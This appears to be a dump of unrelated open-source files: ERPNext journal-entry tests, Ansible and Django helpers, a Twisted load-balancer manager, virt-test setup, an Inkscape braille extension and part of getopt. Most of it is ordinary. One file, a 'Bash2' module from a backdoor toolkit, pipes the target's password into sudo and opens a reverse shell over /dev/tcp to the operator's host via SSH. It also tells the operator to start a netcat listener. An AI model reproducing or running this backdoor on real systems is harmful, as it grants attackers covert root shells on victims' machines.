from erpnext.exceptions import InvalidAccountCurrency
class TestJournalEntry(unittest.TestCase):
def test_journal_entry_with_against_jv(self):
jv_invoice = frappe.copy_doc(test_records[2])
base_jv = frappe.copy_doc(test_records[0])
self.jv_against_voucher_testcase(base_jv, jv_invoice)
def test_jv_against_sales_order(self):
from erpnext.selling.doctype.sales_order.test_sales_order import make_sales_order
sales_order = make_sales_order(do_not_save=True)
base_jv = frappe.copy_doc(test_records[0])
self.jv_against_voucher_testcase(base_jv, sales_order)
def test_jv_against_purchase_order(self):
from erpnext.buying.doctype.purchase_order.test_purchase_order import create_purchase_order
purchase_order = create_purchase_order(do_not_save=True)
base_jv = frappe.copy_doc(test_records[1])
self.jv_against_voucher_testcase(base_jv, purchase_order)
def jv_against_voucher_testcase(self, base_jv, test_voucher):
dr_or_cr = "credit" if test_voucher.doctype in ["Sales Order", "Journal Entry"] else "debit"
test_voucher.insert()
test_voucher.submit()
if test_voucher.doctype == "Journal Entry":
self.assertTrue(frappe.db.sql("""select name from `tabJournal Entry Account`
where account = %s and docstatus = 1 and parent = %s""",
("_Test Receivable - _TC", test_voucher.name)))
self.assertFalse(frappe.db.sql("""select name from `tabJournal Entry Account`
where reference_type = %s and reference_name = %s""", (test_voucher.doctype, test_voucher.name)))
base_jv.get("accounts")[0].is_advance = "Yes" if (test_voucher.doctype in ["Sales Order", "Purchase Order"]) else "No"
base_jv.get("accounts")[0].set("reference_type", test_voucher.doctype)
base_jv.get("accounts")[0].set("reference_name", test_voucher.name)
base_jv.insert()
base_jv.submit()
submitted_voucher = frappe.get_doc(test_voucher.doctype, test_voucher.name)
self.assertTrue(frappe.db.sql("""select name from `tabJournal Entry Account`
where reference_type = %s and reference_name = %s and {0}=400""".format(dr_or_cr),
(submitted_voucher.doctype, submitted_voucher.name)))
if base_jv.get("accounts")[0].is_advance == "Yes":
self.advance_paid_testcase(base_jv, submitted_voucher, dr_or_cr)
self.cancel_against_voucher_testcase(submitted_voucher)
def advance_paid_testcase(self, base_jv, test_voucher, dr_or_cr):
#Test advance paid field
advance_paid = frappe.db.sql("""select advance_paid from `tab%s`
where name=%s""" % (test_voucher.doctype, '%s'), (test_voucher.name))
payment_against_order = base_jv.get("accounts")[0].get(dr_or_cr)
self.assertTrue(flt(advance_paid[0][0]) == flt(payment_against_order))
def cancel_against_voucher_testcase(self, test_voucher):
if test_voucher.doctype == "Journal Entry":
# if test_voucher is a Journal Entry, test cancellation of test_voucher
test_voucher.cancel()
self.assertFalse(frappe.db.sql("""select name from `tabJournal Entry Account`
where reference_type='Journal Entry' and reference_name=%s""", test_voucher.name))
elif test_voucher.doctype in ["Sales Order", "Purchase Order"]:
# if test_voucher is a Sales Order/Purchase Order, test error on cancellation of test_voucher
submitted_voucher = frappe.get_doc(test_voucher.doctype, test_voucher.name)
self.assertRaises(frappe.LinkExistsError, submitted_voucher.cancel)
def test_jv_against_stock_account(self):
from erpnext.stock.doctype.purchase_receipt.test_purchase_receipt import set_perpetual_inventory
set_perpetual_inventory()
jv = frappe.copy_doc(test_records[0])
jv.get("accounts")[0].update({
"account": get_inventory_account('_Test Company'),
"company": "_Test Company",
"party_type": None,
"party": None
})
jv.insert()
from erpnext.accounts.general_ledger import StockAccountInvalidTransaction
self.assertRaises(StockAccountInvalidTransaction, jv.submit)
set_perpetual_inventory(0)
def test_multi_currency(self):
jv = make_journal_entry("_Test Bank USD - _TC",
"_Test Bank - _TC", 100, exchange_rate=50, save=False)
jv.get("accounts")[1].credit_in_account_currency = 5000
jv.submit()
gl_entries = frappe.db.sql("""select account, account_currency, debit, credit,
debit_in_account_currency, credit_in_account_currency
from `tabGL Entry` where voucher_type='Journal Entry' and voucher_no=%s
order by account asc""", jv.name, as_dict=1)
self.assertTrue(gl_entries)
expected_values = {
"_Test Bank USD - _TC": {
"account_currency": "USD",
"debit": 5000,
"debit_in_account_currency": 100,
"credit": 0,
"credit_in_account_currency": 0
},
"_Test Bank - _TC": {
"account_currency": "INR",
"debit": 0,
"debit_in_account_currency": 0,
"credit": 5000,
"credit_in_account_currency": 5000
}
}
for field in ("account_currency", "debit", "debit_in_account_currency", "credit", "credit_in_account_currency"):
for i, gle in enumerate(gl_entries):
self.assertEqual(expected_values[gle.account][field], gle[field])
# cancel
jv.cancel()
gle = frappe.db.sql("""select name from `tabGL Entry`
where voucher_type='Sales Invoice' and voucher_no=%s""", jv.name)
self.assertFalse(gle)
def test_disallow_change_in_account_currency_for_a_party(self):
# create jv in USD
jv = make_journal_entry("_Test Bank USD - _TC",
"_Test Receivable USD - _TC", 100, save=False)
jv.accounts[1].update({
"party_type": "Customer",
"party": "_Test Customer USD"
})
jv.submit()
# create jv in USD, but account currency in INR
jv = make_journal_entry("_Test Bank - _TC",
"_Test Receivable - _TC", 100, save=False)
jv.accounts[1].update({
"party_type": "Customer",
"party": "_Test Customer USD"
})
self.assertRaises(InvalidAccountCurrency, jv.submit)
# back in USD
jv = make_journal_entry("_Test Bank USD - _TC",
"_Test Receivable USD - _TC", 100, save=False)
jv.accounts[1].update({
"party_type": "Customer",
"party": "_Test Customer USD"
})
jv.submit()
def test_inter_company_jv(self):
frappe.db.set_value("Account", "Sales Expenses - _TC", "inter_company_account", 1)
frappe.db.set_value("Account", "Buildings - _TC", "inter_company_account", 1)
frappe.db.set_value("Account", "Sales Expenses - _TC1", "inter_company_account", 1)
frappe.db.set_value("Account", "Buildings - _TC1", "inter_company_account", 1)
jv = make_journal_entry("Sales Expenses - _TC", "Buildings - _TC", 100, posting_date=nowdate(), cost_center = "Main - _TC", save=False)
jv.voucher_type = "Inter Company Journal Entry"
jv.multi_currency = 0
jv.insert()
jv.submit()
jv1 = make_journal_entry("Sales Expenses - _TC1", "Buildings - _TC1", 100, posting_date=nowdate(), cost_center = "Main - _TC1", save=False)
jv1.inter_company_journal_entry_reference = jv.name
jv1.company = "_Test Company 1"
jv1.voucher_type = "Inter Company Journal Entry"
jv1.multi_currency = 0
jv1.insert()
jv1.submit()
jv.reload()
self.assertEqual(jv.inter_company_journal_entry_reference, jv1.name)
self.assertEqual(jv1.inter_company_journal_entry_reference, jv.name)
jv.cancel()
jv1.reload()
jv.reload()
self.assertEqual(jv.inter_company_journal_entry_reference, "")
self.assertEqual(jv1.inter_company_journal_entry_reference, "")
def test_jv_for_enable_allow_cost_center_in_entry_of_bs_account(self):
from erpnext.accounts.doctype.cost_center.test_cost_center import create_cost_center
accounts_settings = frappe.get_doc('Accounts Settings', 'Accounts Settings')
accounts_settings.allow_cost_center_in_entry_of_bs_account = 1
accounts_settings.save()
cost_center = "_Test Cost Center for BS Account - _TC"
create_cost_center(cost_center_name="_Test Cost Center for BS Account", company="_Test Company")
jv = make_journal_entry("_Test Cash - _TC", "_Test Bank - _TC", 100, cost_center = cost_center, save=False)
jv.voucher_type = "Bank Entry"
jv.multi_currency = 0
jv.cheque_no = "112233"
jv.cheque_date = nowdate()
jv.insert()
jv.submit()
expected_values = {
"_Test Cash - _TC": {
"cost_center": cost_center
},
"_Test Bank - _TC": {
"cost_center": cost_center
}
}
gl_entries = frappe.db.sql("""select account, cost_center, debit, credit
from `tabGL Entry` where voucher_type='Journal Entry' and voucher_no=%s
order by account asc""", jv.name, as_dict=1)
self.assertTrue(gl_entries)
for gle in gl_entries:
self.assertEqual(expected_values[gle.account]["cost_center"], gle.cost_center)
accounts_settings.allow_cost_center_in_entry_of_bs_account = 0
accounts_settings.save()
def test_jv_account_and_party_balance_for_enable_allow_cost_center_in_entry_of_bs_account(self):
from erpnext.accounts.doctype.cost_center.test_cost_center import create_cost_center
from erpnext.accounts.utils import get_balance_on
accounts_settings = frappe.get_doc('Accounts Settings', 'Accounts Settings')
accounts_settings.allow_cost_center_in_entry_of_bs_account = 1
accounts_settings.save()
cost_center = "_Test Cost Center for BS Account - _TC"
create_cost_center(cost_center_name="_Test Cost Center for BS Account", company="_Test Company")
jv = make_journal_entry("_Test Cash - _TC", "_Test Bank - _TC", 100, cost_center = cost_center, save=False)
account_balance = get_balance_on(account="_Test Bank - _TC", cost_center=cost_center)
jv.voucher_type = "Bank Entry"
jv.multi_currency = 0
jv.cheque_no = "112233"
jv.cheque_date = nowdate()
jv.insert()
jv.submit()
expected_account_balance = account_balance - 100
account_balance = get_balance_on(account="_Test Bank - _TC", cost_center=cost_center)
self.assertEqual(expected_account_balance, account_balance)
accounts_settings.allow_cost_center_in_entry_of_bs_account = 0
accounts_settings.save()
def make_journal_entry(account1, account2, amount, cost_center=None, posting_date=None, exchange_rate=1, save=True, submit=False, project=None):
if not cost_center:
cost_center = "_Test Cost Center - _TC"
jv = frappe.new_doc("Journal Entry")
jv.posting_date = posting_date or nowdate()
jv.company = "_Test Company"
jv.user_remark = "test"
jv.multi_currency = 1
jv.set("accounts", [
{
"account": account1,
"cost_center": cost_center,
"project": project,
"debit_in_account_currency": amount if amount > 0 else 0,
"credit_in_account_currency": abs(amount) if amount < 0 else 0,
"exchange_rate": exchange_rate
}, {
"account": account2,
"cost_center": cost_center,
"project": project,
"credit_in_account_currency": amount if amount > 0 else 0,
"debit_in_account_currency": abs(amount) if amount < 0 else 0,
"exchange_rate": exchange_rate
}
])
if save or submit:
jv.insert()
if submit:
jv.submit()
return jv
test_records = frappe.get_test_records('Journal Entry')
| gpl-3.0 |
ATIX-AG/ansible | lib/ansible/vars/reserved.py | 40 | 2591 | # (c) 2017 Ansible By Red Hat
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.playbook import Play
from ansible.playbook.block import Block
from ansible.playbook.role import Role
from ansible.playbook.task import Task
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
def get_reserved_names(include_private=True):
''' this function returns the list of reserved names associated with play objects'''
public = set()
private = set()
result = set()
# FIXME: find a way to 'not hardcode', possibly need role deps/includes
class_list = [Play, Role, Block, Task]
for aclass in class_list:
aobj = aclass()
# build ordered list to loop over and dict with attributes
for attribute in aobj.__dict__['_attributes']:
if 'private' in attribute:
private.add(attribute)
else:
public.add(attribute)
# local_action is implicit with action
if 'action' in public:
public.add('local_action')
# loop implies with_
# FIXME: remove after with_ is not only deprecated but removed
if 'loop' in private or 'loop' in public:
public.add('with_')
if include_private:
result = public.union(private)
else:
result = public
return result
def warn_if_reserved(myvars):
''' this function warns if any variable passed conflicts with internally reserved names '''
varnames = set(myvars)
varnames.discard('vars') # we add this one internally, so safe to ignore
for varname in varnames.intersection(_RESERVED_NAMES):
display.warning('Found variable using reserved name: %s' % varname)
def is_reserved_name(name):
return name in _RESERVED_NAMES
_RESERVED_NAMES = frozenset(get_reserved_names())
| gpl-3.0 |
CuonDeveloper/cuon | cuon_server/LoadBalancer/txlb/manager.py | 6 | 18051 | import os
import time
from datetime import datetime
from twisted.protocols import amp
from twisted.internet import protocol
from txlb import util
from txlb import model
from txlb import proxy
from txlb import config
from txlb import logging
from txlb import schedulers
class Error(Exception):
pass
class UnknownHostAndPortError(Exception):
"""
An operation was attempted that needed both host and port values to be
defined.
"""
class UnknowndServiceError(Error):
"""
An operation was invalid due to the fact that no service has been defined.
"""
def checkBadHosts(configuration, director):
"""
This function checks the director's hosts marked as "unavailable" and puts
them back into use.
"""
if not configuration.manager.hostCheckEnabled:
return
for name, service in director.getServices():
# since all proxies for a service share a tracker,
# we only need to check the first proxy.
group = service.getEnabledGroup()
tracker = director.getTracker(name, group.name)
badHosts = tracker.badhosts
for hostPort, timeAndError in badHosts.items():
when, what = badHosts[hostPort]
logging.log("re-adding %s automatically\n" % str(hostPort))
hostname = tracker.getHostNames()[hostPort]
del badHosts[hostPort]
tracker.newHost(hostPort, hostname)
def checkConfigChanges(configFile, configuration, director):
"""
This function replaces the current on-disk configuration with the
adjustments that have been made in-memory (likely from the admin web UI). A
backup of the original is made prior to replacement.
Also, changes made on disc should have the ability to be re-read into
memory. Obviously there are all sorts of issues at play, here: race
conditions, differences and the need to merge, conflict resolution, etc.
"""
if not configuration.manager.configCheckEnabled:
return
# disable the admin UI or at the very least, make it read-only
director.setReadOnly()
# compare in-memory config with on-disk config
current = configuration.toXML()
disk = config.Config(configFile).toXML()
if current != disk:
print "Configurations are different; backing up and saving to disk ..."
# backup old file
backupFile = "%s-%s" % (
configFile, datetime.now().strftime('%Y%m%d%H%M%S'))
os.rename(configFile, backupFile)
# save configuration
fh = open(configFile, 'w+')
fh.write(current)
fh.close()
# re-enable admin UI
director.setReadWrite()
class GetClientAddress(amp.Command):
"""
Note: supplied by Apple.
"""
arguments = [('host', amp.String()),
('port', amp.Integer())]
response = [('host', amp.String()),
('port', amp.Integer())]
errors = {UnknownHostAndPortError: 'UNKNOWN_PORT'}
class ControlProtocol(amp.AMP):
"""
Note: supplied by Apple.
"""
def __init__(self, director):
self.director = director
def getClientAddress(self, host, port):
host, port = self.director.getClientAddress(host, port)
if (host, port) == (None, None):
raise UnknownHostAndPortError()
return {'host': host, 'port': port}
GetClientAddress.responder(getClientAddress)
class ControlFactory(protocol.ServerFactory):
"""
Note: supplied by Apple.
"""
def __init__(self, director):
self.director = director
def buildProtocol(self, addr):
return ControlProtocol(self.director)
class ProxyManager(object):
"""
The purpose of this class is to start the load-balancer proxies for
enabled groups.
Note that this was formerly known as the Director, thus all the 'director'
variable names.
"""
def __init__(self, services=[]):
self.services = {}
if services:
for service in services:
self.addService(service)
self.proxies = {}
# XXX hopefully, the trackers attribute is temporary
self.trackers = {}
self._connections = {}
self.isReadOnly = False
def setReadOnly(self):
"""
Set the proxy manager to read-only; this is intended to be read by
other parts of the application (such as the admin interface) whenever
whenever mutable state items are being manipulated. It doesn't lock
anything, it simply provides something that can be read.
"""
self.isReadOnly = True
def setReadWrite(self):
"""
Set the proxy to read-write.
"""
self.isReadOnly = False
def setServices(self, services):
"""
This method is for use when it is necssary to set a collection of
model.ProxyService objects at once.
"""
self.services = services
def getServices(self):
"""
Return the keys and values of the services attribute.
"""
return self.services.items()
def getFirstService(self):
"""
This is useful when load balancing a service via the API, something
that one only does with a single service.
"""
return self.getServices()[0]
def addService(self, service):
"""
This method adds a model.ProxyService instance to the proxy manager.
"""
self.services[service.name] = service
def getService(self, serviceName):
"""
model.ProxyService instances can be retrieved from the proxy manager by
a key look-up
"""
return self.services[serviceName]
def getGroups(self, serviceName):
"""
Get the keys and values for the groups in a given service.
"""
return self.getService(serviceName).getGroups()
def getGroup(self, serviceName, groupName):
"""
For a proxy service that has been addded to the proxy manager,
model.ProxyGroup instances can be added to it.
"""
return self.getService(serviceName).getGroup(groupName)
def getHost(self, serviceName, groupName, hostName):
"""
mode.ProxyHost instances can be added to the proxy manager, but they
need to be associated with a proxy service and a proxy group.
"""
return self.getGroup().getHost(hostName)
def addTracker(self, serviceName, groupName, tracker):
"""
The tracker is the object that is responsible for recording the status
of connections, number of failuers, number of open connections, etc. A
tracker that is added to the proxy manager needs to be associated with
a proxy service and a proxy group.
"""
self.trackers[(serviceName, groupName)] = tracker
def getTracker(self, serviceName, groupName):
"""
Trackers can be looked up by the keys that were used to add them: proxy
service and proxy group names.
"""
return self.trackers[(serviceName,groupName)]
def getScheduler(self, serviceName, groupName):
"""
The sceduler is the object responsible for determining which host will
accpet the latest proxied request.
"""
return self.getGroup(serviceName, groupName).scheduler
def addProxy(self, serviceName, proxy):
"""
Add an already-created instance of proxy.Proxy to the manager's proxy
list.
"""
if not self.proxies.has_key(serviceName):
self.proxies[serviceName] = []
self.proxies[serviceName].append(proxy)
def createProxy(self, serviceName, host, port):
"""
Create a new Proxy and add it to the internal data structure. Note that
this is not a proxy model, but rather the proxy.Proxy object itself.
The parameters passed to Proxy will tell the load balancer on what
interface and port to listen for in-coming traffic.
"""
# proxies are associated with a specific tracker; trackers are
# associated with a specific service; proxies are also associated with
# a specific service, so there doesn't seem to be any need for an
# explicit association between proxies and trackers. The proxy can
# access the pm, which get get the tracker it needs.
p = proxy.Proxy(serviceName, host, port, self)
self.addProxy(serviceName, p)
def updateProxy(self, serviceName, index, newProxy):
"""
Sometimes (as in the case of changing the port on which the proxy is
listening) we need to update the proxy. This method allows one to do
this by specficically indentifying the proxy.
"""
self.proxies[serviceName][index] = newProxy
def getProxies(self):
"""
Return the keys and values for the proxies attribute. The proxies
attribute on the proxy manager stores a dictionay of proxy.Proxy
instances.
"""
return self.proxies.items()
def getProxy(self, serviceName, index=None):
"""
A Proxy instance can be retrieve by the service name and (since there
can be more than one port listening per service) index.
"""
proxies = self.proxies[serviceName]
if index == None:
return proxies
return proxies[index]
def addHost(self, serviceName, groupName, proxiedName, ip, weight=1):
"""
This method updates not only the tracker data, but the models as well.
"""
tracker = self.getTracker(serviceName=serviceName, groupName=groupName)
# XXX does the tracker need to know about weights?
tracker.newHost(name=proxiedName, ip=ip)
# add modeling information
host, port = util.splitHostPort(ip)
proxiedHost = model.ProxyHost(proxiedName, host, port, weight)
self.getGroup(serviceName, groupName).addHost(proxiedHost)
def delHost(self, serviceName, groupName, proxiedName, ip):
"""
This method updates not only the tracker data, but the models as well.
"""
tracker = self.getTracker(serviceName=serviceName, groupName=groupName)
tracker.delHost(name=proxiedName, ip=ip)
# remove from modeling information, too
self.getGroup(serviceName, groupName).delHost(proxiedName)
def switchGroup(self, serviceName, oldGroupName, newGroupName):
"""
This method needs to update the two affected proxy group models and
setup the new tracker.
"""
oldGroup = self.getService(serviceName).getGroup(oldGroupName)
oldGroup.disable()
newGroup = self.getService(serviceName).getGroup(newGroupName)
newGroup.enable()
for proxy in self.getProxy(serviceName):
proxy.setTracker(newGroupName)
def getClientAddress(self, host, port):
"""
"""
return self._connections.get((host, port), (None, None))
def setClientAddress(self, host, peer):
"""
"""
self._connections[host] = peer
def proxyManagerFactory(services):
"""
This factory is for simplifying the common task of creating a proxy manager
with presets for many attributes and/or much data.
"""
# check to see what got passed, in case we need to convert it
if isinstance(services[0], model.HostMapper):
services = model.convertMapperToModel(services)
# create the manager
pm = ProxyManager(services)
for serviceName, service in pm.getServices():
# set up the trackers for each group
for groupName, group in pm.getGroups(serviceName):
tracker = HostTracking(group)
scheduler = schedulers.schedulerFactory(group.lbType, tracker)
pm.addTracker(serviceName, groupName, tracker)
# now let's setup actual proxies for the hosts in the enabled group
group = service.getEnabledGroup()
# XXX maybe won't need this next line
#enabledTracker = pm.getTracker(service.name, group.name)
for host, port in service.addresses:
pm.createProxy(serviceName, host, port)
# return proxy manager
return pm
class HostTracking(object):
"""
This class is responsible for tracking proxied host metadata (such as
connection information and failure counts).
Schedulers are responsible for selecting the next proxied host that will
recieve the client request. Schedulers dependent upon their related
trackers (instances of this class) for connection information.
"""
def __init__(self, proxyGroup):
self.group = proxyGroup
self.hosts = []
self.hostnames = {}
self.badhosts = {}
self.openconns = {}
# the values in self.available indicate the number of connections that
# are currently being attempted; a down host is not in available
self.available = {}
self.failed = {}
self.totalconns = {}
self.lastclose = {}
# this next attribute gets set when a Scheduler is iniated; this class
# needs the scheduler attribute for nextHost calls
self.scheduler = None
self.initializeGroupHosts()
def initializeGroupHosts(self):
for hostName, host in self.group.getHosts():
self.newHost((host.hostname, host.port), hostName)
def getStats(self):
def sorter(attr):
sorts = {}
data = getattr(self, attr)
hostPortCounts = data.items()
hostPortCounts.sort()
for hostPort, count in hostPortCounts:
sorts['%s:%s' % hostPort] = count
return sorts
stats = {}
# we don't present open connections for hosts that aren't available
stats['openconns'] = sorter('available')
stats['totals'] = sorter('totalconns')
stats['failed'] = sorter('failed')
stats['bad'] = self.badhosts
return stats
def showStats(self, verbose=1):
stats = []
stats.append("%d open connections" % len(self.openconns.keys()))
hostPortCounts = self.available.items()
hostPortCounts.sort()
stats = stats + [str(x) for x in hostPortCounts]
if verbose:
openHosts = [x[1] for x in self.openconns.values()]
openHosts.sort()
stats = stats + [str(x) for x in openHosts]
return "\n".join(stats)
def getHost(self, senderFactory, client_addr=None):
host = self.scheduler.nextHost(client_addr)
if not host:
return None
cur = self.available.get(host)
self.openconns[senderFactory] = (time.time(), host)
self.available[host] += 1
return host
def getHostNames(self):
return self.hostnames
def doneHost(self, senderFactory):
try:
t, host = self.openconns[senderFactory]
except KeyError:
return
del self.openconns[senderFactory]
if self.available.get(host) is not None:
self.available[host] -= 1
self.totalconns[host] += 1
self.lastclose[host] = time.time()
def newHost(self, ip, name):
if type(ip) is not type(()):
ip = util.splitHostPort(ip)
self.hosts.append(ip)
self.hostnames[ip] = name
# XXX why is this needed too?
self.hostnames['%s:%d' % ip] = name
self.available[ip] = 0
self.totalconns[ip] = 0
def delHost(self, ip=None, name=None, activegroup=0):
"""
remove a host
"""
if ip is not None:
if type(ip) is not type(()):
ip = util.splitHostPort(ip)
elif name is not None:
for ip in self.hostnames.keys():
if self.hostnames[ip] == name:
break
raise ValueError, "No host named %s"%(name)
else:
raise ValueError, "Neither ip nor name supplied"
if activegroup and len(self.hosts) == 1:
return 0
if ip in self.hosts:
self.hosts.remove(ip)
del self.hostnames[ip]
del self.available[ip]
if self.failed.has_key(ip):
del self.failed[ip]
del self.totalconns[ip]
elif self.badhosts.has_key(ip):
del self.badhosts[ip]
else:
raise ValueError, "Couldn't find host"
return 1
def deadHost(self, senderFactory, reason='', doLog=True):
"""
This method gets called when a proxied host is unreachable.
"""
# if this throws an exception here, I think it's because all the hosts
# have been removed from the pool
try:
epochTime, hostPort = self.openconns[senderFactory]
except KeyError:
if doLog:
msg = """Wow, Bender says "We're boned." No hosts available.\n"""
logging.log(msg)
return
if not self.failed.has_key(hostPort):
self.failed[hostPort] = 1
else:
self.failed[hostPort] += 1
if hostPort in self.hosts:
if doLog:
logging.log("marking host %s down (%s)\n" % (
str(hostPort), reason.getErrorMessage()))
self.hosts.remove(hostPort)
if self.available.has_key(hostPort):
del self.available[hostPort]
# XXX I don't think we want to delete the previously gathered stats for
# the hosts that go bad... I'll keep this code here (but commented out)
# in case there's a good reason for it and I'm nost not thinking of it
# right now
#if self.totalconns.has_key(hostPort):
# del self.totalconns[hostPort]
self.badhosts[hostPort] = (time.time(), reason)
# make sure we also mark this session as done.
self.doneHost(senderFactory)
| gpl-3.0 |
rcbops/python-django-buildpackage | django/contrib/comments/__init__.py | 423 | 3333 | from django.conf import settings
from django.core import urlresolvers
from django.core.exceptions import ImproperlyConfigured
from django.contrib.comments.models import Comment
from django.contrib.comments.forms import CommentForm
from django.utils.importlib import import_module
DEFAULT_COMMENTS_APP = 'django.contrib.comments'
def get_comment_app():
"""
Get the comment app (i.e. "django.contrib.comments") as defined in the settings
"""
# Make sure the app's in INSTALLED_APPS
comments_app = get_comment_app_name()
if comments_app not in settings.INSTALLED_APPS:
raise ImproperlyConfigured("The COMMENTS_APP (%r) "\
"must be in INSTALLED_APPS" % settings.COMMENTS_APP)
# Try to import the package
try:
package = import_module(comments_app)
except ImportError:
raise ImproperlyConfigured("The COMMENTS_APP setting refers to "\
"a non-existing package.")
return package
def get_comment_app_name():
"""
Returns the name of the comment app (either the setting value, if it
exists, or the default).
"""
return getattr(settings, 'COMMENTS_APP', DEFAULT_COMMENTS_APP)
def get_model():
"""
Returns the comment model class.
"""
if get_comment_app_name() != DEFAULT_COMMENTS_APP and hasattr(get_comment_app(), "get_model"):
return get_comment_app().get_model()
else:
return Comment
def get_form():
"""
Returns the comment ModelForm class.
"""
if get_comment_app_name() != DEFAULT_COMMENTS_APP and hasattr(get_comment_app(), "get_form"):
return get_comment_app().get_form()
else:
return CommentForm
def get_form_target():
"""
Returns the target URL for the comment form submission view.
"""
if get_comment_app_name() != DEFAULT_COMMENTS_APP and hasattr(get_comment_app(), "get_form_target"):
return get_comment_app().get_form_target()
else:
return urlresolvers.reverse("django.contrib.comments.views.comments.post_comment")
def get_flag_url(comment):
"""
Get the URL for the "flag this comment" view.
"""
if get_comment_app_name() != DEFAULT_COMMENTS_APP and hasattr(get_comment_app(), "get_flag_url"):
return get_comment_app().get_flag_url(comment)
else:
return urlresolvers.reverse("django.contrib.comments.views.moderation.flag",
args=(comment.id,))
def get_delete_url(comment):
"""
Get the URL for the "delete this comment" view.
"""
if get_comment_app_name() != DEFAULT_COMMENTS_APP and hasattr(get_comment_app(), "get_delete_url"):
return get_comment_app().get_delete_url(comment)
else:
return urlresolvers.reverse("django.contrib.comments.views.moderation.delete",
args=(comment.id,))
def get_approve_url(comment):
"""
Get the URL for the "approve this comment from moderation" view.
"""
if get_comment_app_name() != DEFAULT_COMMENTS_APP and hasattr(get_comment_app(), "get_approve_url"):
return get_comment_app().get_approve_url(comment)
else:
return urlresolvers.reverse("django.contrib.comments.views.moderation.approve",
args=(comment.id,))
| bsd-3-clause |
sathnaga/virt-test | tools/common.py | 12 | 1426 | import os, sys
def load_setup_modules(client_dir):
try:
sys.path.insert(0, client_dir)
import setup_modules
finally:
sys.path.pop(0)
return setup_modules
dirname = os.path.dirname(sys.modules[__name__].__file__)
virt_test_dir = os.path.abspath(os.path.join(dirname, ".."))
sys.path.insert(0, virt_test_dir)
try:
import autotest.client.setup_modules as setup_modules
client_dir = os.path.dirname(setup_modules.__file__)
sm = setup_modules
except ImportError:
try:
client_dir = os.path.abspath(os.path.join(dirname, "..", "..", ".."))
sm = load_setup_modules(client_dir)
except:
try:
client_dir = os.path.join(os.environ['AUTOTEST_PATH'], 'client')
except KeyError:
print("Environment variable $AUTOTEST_PATH not set. "
"please set it to a path containing an autotest checkout")
print("Or install the autotest-framework package for your distro")
sys.exit(1)
if not os.path.isdir(client_dir):
print('Autotest client library directory was not found at: "%s"' %
client_dir)
print('Please check if the environment variable "$AUTOTEST_PATH" '
'points to a valid location')
sys.exit(1)
sm = load_setup_modules(client_dir)
sm.setup(base_path=client_dir, root_module_name="autotest.client")
| gpl-2.0 |
sovaa/backdoorme | backdoors/shell/bash2.py | 1 | 1323 | from backdoors.backdoor import *
import subprocess
import threading
class Bash2(Backdoor):
prompt = Fore.RED + "(bash) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using second Bash module..."
self.core = core
self.options = {
"port" : Option("port", 53923, "port to connect to", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "A slightly different (and more reliable) version of the other bash backdoor, which does not prompt for the password on the client-side."
def get_command(self):
return "echo " + self.core.curtarget.pword + " | sudo -S nohup 0<&196;exec 196<>/dev/tcp/" + self.core.localIP + "/%s; sh <&196 >&196 2>&196" % self.get_value("port")
def do_exploit(self, args):
port = self.get_value("port")
target = self.core.curtarget
print(GOOD + "Initializing backdoor...")
input("Run the following command: nc -vnlp %s in another shell to start the listener." % port)
target.ssh.exec_command(self.get_command())
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
| mit |
tik0/inkscapeGrid | share/extensions/text_braille.py | 6 | 1177 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import chardataeffect, inkex, string
convert_table = {\
'a': unicode("⠁", "utf-8"),\
'b': unicode("⠃", "utf-8"),\
'c': unicode("⠉", "utf-8"),\
'd': unicode("⠙", "utf-8"),\
'e': unicode("⠑", "utf-8"),\
'f': unicode("⠋", "utf-8"),\
'g': unicode("⠛", "utf-8"),\
'h': unicode("⠓", "utf-8"),\
'i': unicode("⠊", "utf-8"),\
'j': unicode("⠚", "utf-8"),\
'k': unicode("⠅", "utf-8"),\
'l': unicode("⠇", "utf-8"),\
'm': unicode("⠍", "utf-8"),\
'n': unicode("⠝", "utf-8"),\
'o': unicode("⠕", "utf-8"),\
'p': unicode("⠏", "utf-8"),\
'q': unicode("⠟", "utf-8"),\
'r': unicode("⠗", "utf-8"),\
's': unicode("⠎", "utf-8"),\
't': unicode("⠞", "utf-8"),\
'u': unicode("⠥", "utf-8"),\
'v': unicode("⠧", "utf-8"),\
'w': unicode("⠺", "utf-8"),\
'x': unicode("⠭", "utf-8"),\
'y': unicode("⠽", "utf-8"),\
'z': unicode("⠵", "utf-8"),\
}
class C(chardataeffect.CharDataEffect):
def process_chardata(self,text, line, par):
r = ""
for c in text:
if convert_table.has_key(c.lower()):
r = r + convert_table[c.lower()]
else:
r = r + c
return r
c = C()
c.affect()
| gpl-2.0 |
40223110/2015CDAFinal_test2 | static/Brython3.1.0-20150301-090019/Lib/getopt.py | 845 | 7488 | """Parser for command line options.
This module helps scripts to parse the command line arguments in
sys.argv. It supports the same conventions as the Unix getopt()
function (including the special meanings of arguments of the form `-'
and `--'). Long options similar to those supported by GNU software
may be used as well via an optional third argument. This module
provides two functions and an exception:
getopt() -- Parse command line options
gnu_getopt() -- Like getopt(), but allow option and non-option arguments
to be intermixed.
GetoptError -- exception (class) raised with 'opt' attribute, which is the
option involved with the exception.
"""
# Long option support added by Lars Wirzenius <[email protected]>.
#
# Gerrit Holl <[email protected]> moved the string-based exceptions
# to class-based exceptions.
#
# Peter Åstrand <[email protected]> added gnu_getopt().
#
# TODO for gnu_getopt():
#
# - GNU getopt_long_only mechanism
# - allow the caller to specify ordering
# - RETURN_IN_ORDER option
# - GNU extension with '-' as first character of option string
# - optional arguments, specified by double colons
# - a option string with a W followed by semicolon should
# treat "-W foo" as "--foo"
__all__ = ["GetoptError","error","getopt","gnu_getopt"]
import os
try:
from gettext import gettext as _
except ImportError:
# Bootstrapping Python: gettext's dependencies not built yet
def _(s): return s
class GetoptError(Exception):
opt = ''
msg = ''
